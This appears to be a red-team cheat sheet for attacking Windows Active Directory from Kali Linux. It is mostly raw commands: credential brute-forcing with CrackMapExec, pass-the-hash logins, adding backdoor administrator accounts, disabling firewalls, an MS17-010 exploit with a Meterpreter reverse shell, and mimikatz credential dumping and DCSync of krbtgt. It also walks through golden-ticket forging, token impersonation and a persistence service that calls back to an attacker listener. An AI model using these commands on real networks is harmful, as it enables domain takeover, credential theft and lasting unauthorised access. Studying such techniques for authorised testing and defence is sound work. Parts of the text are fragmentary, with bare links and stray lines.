Active Directory Pentesting With Kali Linux - Red Team

https://github.com/ropnop/windapsearch

Download it here:

https://github.com/dirkjanm/ldapdomaindump

enum4linux -u ippsec -p Password12345 -a 192.168.1.50

https://github.com/byt3bl33d3r/CrackMapExec

Bruteforcing examples

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Enumerate shares and access

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares

Enumerate active sessions

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --sessions

Enumerate disks

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --disks

Enumerate logged on users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users

Enumerate domain users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users

pth-winexe -U pentesting/

pth-winexe

apt-get update

apt-get install freerdp-x11

xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54

Install Java:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

sudo apt-get update

Install Neo4j

1. Add the neo4j repo to your apt sources:

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -

echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list

sudo apt-get update

2. Install apt-transport-https with apt

apt-get install apt-transport-https

  3. Install neo4j community edition using apt:

sudo apt-get install neo4j

systemctl stop neo4j

cd /usr/bin

./neo4j console or systemctl start neo4j

You should see the neo4j web console.

6. Authenticate to neo4j in the web console with username neo4j, password neo4j.

7. You’ll be prompted to change this password.

Download the BloodHound GUI

1. Download the latest version of the BloodHound GUI from

2. https://github.com/BloodHoundAD/BloodHound/releases

3. Unzip the folder, then run BloodHound with the –no-sandbox flag:

./BloodHound.bin --no-sandbox

https://bloodhound.readthedocs.io/en/latest/installation/linux.html

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

• usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

• usage: download remote_path local_path

services: list all services. No administrator permissions needed.

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource

Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

https://github.com/BC-SECURITY/Empire

sudo apt install powershell-empire

sudo powershell-empire

https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Listeners

help

uselistener http

info <-  it will display all the options that you can tweak

BindIP to Kali’s IP address

Port to any port number other than 80

execute

https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50

upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat

C:\Users\jenkinsadmin\Documents\launcher.bat

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set paylod windows/meterpreter/reverse_tcp

run

/

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

use Auxiliary/gather/Kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid.rb

run post/windows/gather/enum_ad_computers.rb

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound

for More

search post/windows/gather/

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

Pass The Hash with Psexec: Due to perform this jobs, only we need is NTLM hash of a privileged user. Thats exactly what we gained before with mimikatz.

• use exploit/windows/smb/psexec

  • set SMBDomain pentesting.local

  • set smbuser ippsec

  • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

  • set rhosts 192.168.1.55

  • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

In metasploit framework there is an extension which is called incognito which allows us to perform activities such as token stealing and manipulation.These kind of activities are important in the privilege escalation stage of a penetration test because if we can steal the token of an administrator for example we can perform higher privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\\Administrator

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

use post/windows/escalate/golden_ticket

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit

use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).